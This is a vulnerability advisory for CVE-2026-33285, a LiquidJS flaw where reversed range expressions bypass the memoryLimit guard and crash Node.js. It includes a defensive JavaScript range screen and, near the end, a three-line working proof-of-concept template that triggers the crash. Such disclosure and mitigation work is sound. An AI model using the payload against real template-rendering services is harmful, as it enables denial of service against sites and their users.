Security Vulnerability Report

CVE-2026-33285

Published: 2026-03-26 01:16:27
Last Modified: 2026-03-30 16:46:19

Description

LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to version 10.25.1, LiquidJS's `memoryLimit` security mechanism can be completely bypassed by using reverse range expressions (e.g., `(100000000..1)`), allowing an attacker to allocate unlimited memory. Combined with a string flattening operation (e.g., `replace` filter), this causes a V8 Fatal error that crashes the Node.js process, resulting in complete denial of service from a single HTTP request. Version 10.25.1 patches the issue.
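
A defensive pre-render screen for the range pattern described above, as an added example that is not LiquidJS code and not part of the advisory: it sizes literal range expressions in both directions, so reversed ranges are counted too, and marks variable bounds for review. The function names, the `MAX_RANGE_ITEMS` threshold and the sample template are assumptions constructed for illustration.

```javascript
// Added example (not LiquidJS code). Names and thresholds are assumptions.
const FIXED_VERSION = [10, 25, 1]; // first patched release, per the advisory
const MAX_RANGE_ITEMS = 10000;     // assumed per-range budget; tune per deployment

// True when a plain x.y.z liquidjs release is older than the patched version.
function isAffectedVersion(version) {
  const parts = version.split('.').map((p) => parseInt(p, 10) || 0);
  for (let i = 0; i < 3; i++) {
    const diff = (parts[i] || 0) - FIXED_VERSION[i];
    if (diff !== 0) return diff < 0;
  }
  return false;
}

// Matches (a..b) where each bound is an integer literal or a variable path.
const BOUND = String.raw`(-?\d+|[A-Za-z_][\w.-]*)`;
const RANGE_RE = new RegExp(String.raw`\(\s*${BOUND}\s*\.\.\s*${BOUND}\s*\)`, 'g');
const INT_RE = /^-?\d+$/;

// Returns one finding per range that is oversized or cannot be sized statically.
function screenRanges(template, maxItems = MAX_RANGE_ITEMS) {
  const findings = [];
  for (const m of template.matchAll(RANGE_RE)) {
    const [expr, lo, hi] = m;
    const line = template.slice(0, m.index).split('\n').length;
    if (INT_RE.test(lo) && INT_RE.test(hi)) {
      // Size the range by absolute distance, so (100000000..1) is treated
      // exactly like (1..100000000) instead of looking empty or negative.
      const span = Math.abs(Number(hi) - Number(lo)) + 1;
      if (span > maxItems) {
        findings.push({ line, expr, span, reversed: Number(lo) > Number(hi), verdict: 'reject' });
      }
    } else {
      // A bound read from a variable is only known at render time.
      findings.push({ line, expr, span: null, reversed: null, verdict: 'review' });
    }
  }
  return findings;
}

// Constructed sample template: one small range, one reversed literal, one dynamic bound.
const SAMPLE = [
  '{% for i in (1..5) %}{{ i }}{% endfor %}',
  '{% assign r = (100000000..1) %}',
  '{% for i in (1..n) %}{{ i }}{% endfor %}',
].join('\n');

console.log(isAffectedVersion('10.25.0'), screenRanges(SAMPLE));
```

The screen is a stopgap for deployments that render untrusted templates on an affected version; the `review` findings need a runtime bound on the variable, which a static check cannot supply.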

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:liquidjs:liquidjs:*:*:*:*:*:node.js:*:* - VULNERABLE
LiquidJS < 10.25.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```liquid
{%- comment -%} PoC for CVE-2026-33285 {%- endcomment -%}
{%- assign huge_range = (100000000..1) -%}
{{ huge_range | replace: '0', '0' }}
```

References

https://github.com/harttle/liquidjs/commit/95ddefc056a11a44d9e753fd47a39db2c241e578 (Patch)
https://github.com/harttle/liquidjs/security/advisories/GHSA-9r5m-9576-7f6x (Exploit, Vendor Advisory)

Weaknesses

CWE-20, CWE-400